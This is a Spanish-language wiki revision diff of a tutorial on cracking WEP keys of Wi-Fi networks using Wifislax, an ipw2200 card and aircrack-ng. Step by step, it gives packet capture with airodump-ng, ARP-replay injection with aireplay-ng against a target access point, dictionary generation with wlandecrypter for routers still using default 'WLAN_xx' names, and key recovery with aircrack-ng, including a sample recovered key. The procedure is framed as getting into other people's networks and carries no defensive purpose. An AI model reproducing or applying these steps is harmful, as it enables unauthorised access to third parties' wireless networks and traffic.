User Tools

Site Tools


informatica:linux:wifi:crackear_redes:ipw2200

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
informatica:linux:wifi:crackear_redes:ipw2200 [2009/04/17 09:20] 194.179.83.89informatica:linux:wifi:crackear_redes:ipw2200 [2015/04/13 20:19] (current) – external edit 127.0.0.1
Line 1: Line 1:
 redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack
  
-1. Arrancar con el cd [[http://foro.elhacker.net/profile.html;u=80264;sa=showPosts|Wifislax 3.1]] dentro+1. Arrancar con el cd [[http://www.wifislax.com/descargas.php|Wifislax 3.1]] dentro
  
 2. Seleccionar la primera opción, entorno gráfico 2. Seleccionar la primera opción, entorno gráfico
Line 25: Line 25:
   iwlist ethx scan   iwlist ethx scan
      
-Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSID) y el canal+Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSSID) y el canal
  
 7. Por si las moscas levantar las dos interfaces: 7. Por si las moscas levantar las dos interfaces:
Line 38: Line 38:
  
   iwconfig eth3 essid "ESSID" key 11111111111   iwconfig eth3 essid "ESSID" key 11111111111
-  airodump-ng -c 6 -b BSID -w captura_ESSID rtap0 +  airodump-ng -c 6 -b mac_del_ap -w captura_ESSID rtap0 
-  aireplay-ng -3 -x 1024 -g 1000000 -b BSID -h 00:11:22:33:44:55 -i rtap0 ethx+  aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 ethx 
 + 
 +10. **OPCIONAL**  
 + 
 +Habida cuenta que el equipo se puede quedar tostado, o se puede ir la luz, es conveniente programar una tarea en cron que grabe cada minuto el fichero .cap que almacena las capturas en un llavero usb o bien en el propio disco duro del pc/portátil, al objeto de poder aprovechar el trabajo realizado.  
 + 
 +11.1 Crear el guión: 
 + 
 +nano /root/script.sh 
 + 
 +11.2 Contenido (OJO, comprobad las rutas): 
 + 
 + 
 +<code> 
 +#!/bin/bash 
 + 
 +# Ejemplo para un disco duro 
 +cp /root/*cap /mnt/hda1/captura/ 
 +# Ejemplo para un llavero usb 
 +cp /root/*cap /mnt/sda1/captura/ 
 +</code> 
 + 
 +11.3 Grabar y cerrar 
 + 
 +11.4 Darle permisos de ejecución: 
 + 
 +  chmod +x /root/script.sh 
 + 
 +11.5 Programar la tarea en cron: 
 + 
 +  crontab -e 
 + 
 +11.6 Añadir la siguiente linea (OJO, comprobad las rutas): 
 + 
 +**Revisar**, porque el 2>1 null es importante, si no, no funciona 
 + 
 +  * * * * * /root/script.sh 2>1 null 
 + 
 +11.7 Grabar y salir 
 + 
 +12. **OPCIONAL**  
 + 
 +Existe una aplicación, 'wlandecrypter-ng' que, si la dirección MAC (BSSID) del router es una de las que soporta y el nombre del punto de acceso (ESSID) es del tipo 'WLAN_xx' (por tanto no se ha cambiado su valor de fábrica), genera un diccionario, con lo que se podrá obtener la clave del router con muy pocos paquetes (menos de 10) obtenidos. 
 + 
 +12.1 Teclear en una consola el siguiente comando: 
 + 
 +wlandecrypter BSSID ESSID /root/diccionario_ESSID 
 + 
 +Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está 'soportada' por wlandecrypter-ng. 
 + 
 +13. **OPCIONAL** 
 + 
 +Si pasamos el fichero /root/captura_ESSID.cap a un pc que tenga aircrack-ng instalado, saca la clave en unos pocos segundos. En caso de que lo hagamos desde el propio pc con el live-cd corriendo, puede tardar horas (7, 8...). 
 + 
 +13.1 Instalar aircrack-ng 
 + 
 +  aptitude install aircrack-ng 
 + 
 +14. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados.  
 + 
 +Cuando queramos intentar sacar la contraseña, lanzamos el siguiente comando: 
 + 
 +Si hemos podido generar un diccionario en el paso 12: 
 + 
 +  aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap 
 + 
 +En caso contrario: 
 + 
 +  aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap 
 + 
 +Si tenemos suerte, aparecerá el siguiente mensaje: 
 + 
 +<code> 
 +     KEY FOUND! [ 43:30:30:31:44:32:30:33:44:35:44:31:31 ] (ASCII: C001D203D5D11 ) 
 + Decrypted correctly: 100% 
 +</code> 
 + 
 +Es **MUY** recomendable pasar el fichero .cap a un pc con aircrack-ng instalado (ver paso 13), pues de ese modo se obtiene la clave en unos pocos segundos 
 + 
 +Postdata: Yo en clientes windows, le he metido la clave alfanumérica sin los dos puntos. En el ejemplo anterior, el valor introducido sería: 
 + 
 +  43303031443230334435443131
  
-10. **OPCIONAL** Habida cuenta que el equipo se puede quedar tostado, o se puede ir la luz, es conveniente programar una tarea en cron que grabe cada minuto el fichero .cap que almacena las capturas en un llavero usb o bien en el propio disco duro del pc/portátil, al objeto de poder aprovechar el trabajo realizado.  
  
-10. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados. 
  
informatica/linux/wifi/crackear_redes/ipw2200.1239960045.txt.gz · Last modified: 2015/04/13 20:19 (external edit)